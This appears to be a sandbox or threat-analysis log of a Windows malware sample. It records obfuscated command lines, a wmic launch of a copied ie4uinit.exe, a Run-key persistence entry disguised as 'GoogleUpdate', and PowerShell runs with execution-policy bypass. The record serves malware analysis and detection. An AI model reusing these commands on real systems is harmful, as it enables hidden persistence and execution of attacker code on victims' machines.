"de!h23!!q21!!h7!!h23!e!n16!!f13!a4!n28!e" "!e4!!b29!!k20!!d30!!b29!d]" "%11%\!n16!!h31!robj,ni,!f32!tt!r33!s://sh!x22!r!d6!f!h7!l!d6!!n16!!s24!c!d6!!y10!!h11!!d6!!o26!/test22-pc" "[!u18!!h34!5!l19!!r8!" "!h7!e!f12!ini%oal!q35!f" "!e4!st!o26!i!y10!g!n16!!r8!" "s!d6!!o26!v!h7!!h31!e!y10!a!v36!e=' '" "!n16!!f32!or!h11!!n16!v!h31!!y10!a!v36!!d6!!f13!' '" "oa!c37!=t!s24!in") do echo %~t) > "c:\users\test22\appdata\local\temp\ie!f12!i!y10!!h7!t.t!i38!!h11!" & copy /y c:\windows\!a39!ys!h11!e!v36!3!n40!!x41!ie4!f12!in!h7!!h11!!s24!e!i38!!d6! c:\users\test22\appdata\local\temp\ & ren c:\users\test22\appdata\local\temp!x41!!h7!!d6!u!h7!n!h7!!h11!!s24!txt i!d6!u!h7!!y10!!h7!!h11!.!h7!!y10!!q21! & s!h11!!x22!rt "" /mi!y10! wmic p!o26!!a14!!h31!e!n16!s !h3! c!o26!eate "c:\users\test22\appdata\local\temp\!h7!!d6!4ui!y10!!h7!!h11!!s24!!d6!xe !x42!b!x22!!n16!e!a39!et!h11!in!i9!!n16!"" |
cmd | wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" reg add 'hkey_current_user\software\microsoft\windows\currentversion\run' /v googleupdate /t reg_sz /d 'wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" powershell.exe -noprofile -executionpolicy bypass -file 'c:\users\test22\appdata\roaming\adobe\merge.ps1' test22-pc' /f |
cmd | wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" wscript "c:\users\test22\appdata\roaming\adobe\run_all.vbs" powershell.exe -noprofile -executionpolicy bypass -file 'c:\users\test22\appdata\roaming\adobe\merge.ps1' test22-pc |
parent_process | wscript.exe | martian_process | cmd /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC" /f |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC |
parent_process | wscript.exe | martian_process | cmd /c wscript C:\Users\test22\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\test22\AppData\Roaming\Adobe\merge.ps1" TEST22-PC |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC |
parent_process | wscript.exe | martian_process | cmd /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\test22\AppData\Roaming\Adobe\merge.ps1 TEST22-PC |
option | -executionpolicy bypass | value | Attempts to bypass execution policy |
option | -noprofile | value | Does not load current user profile |
option | -executionpolicy bypass | value | Attempts to bypass execution policy |
option | -noprofile | value | Does not load current user profile |
option | -executionpolicy bypass | value | Attempts to bypass execution policy |
option | -noprofile | value | Does not load current user profile |
option | -executionpolicy bypass | value | Attempts to bypass execution policy |
option | -noprofile | value | Does not load current user profile |
option | -executionpolicy bypass | value | Attempts to bypass execution policy |
option | -noprofile | value | Does not load current user profile |
option | -executionpolicy bypass | value | Attempts to bypass execution policy |
option | -noprofile | value | Does not load current user profile |
option | -executionpolicy bypass | value | Attempts to bypass execution policy |
option | -noprofile | value | Does not load current user profile |
option | -executionpolicy bypass | value | Attempts to bypass execution policy |
option | -noprofile | value | Does not load current user profile |
option | -executionpolicy bypass | value | Attempts to bypass execution policy |
option | -noprofile | value | Does not load current user profile |
option | -executionpolicy bypass | value | Attempts to bypass execution policy |
option | -noprofile | value | Does not load current user profile |
option | -executionpolicy bypass | value | Attempts to bypass execution policy |
option | -noprofile | value | Does not load current user profile |
option | -executionpolicy bypass | value | Attempts to bypass execution policy |
option | -noprofile | value | Does not load current user profile |
option | -executionpolicy bypass | value | Attempts to bypass execution policy |
option | -noprofile | value | Does not load current user profile |
file | C:\Windows\SysWOW64\wscript.exe |
file | C:\Windows\System32\cmd.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |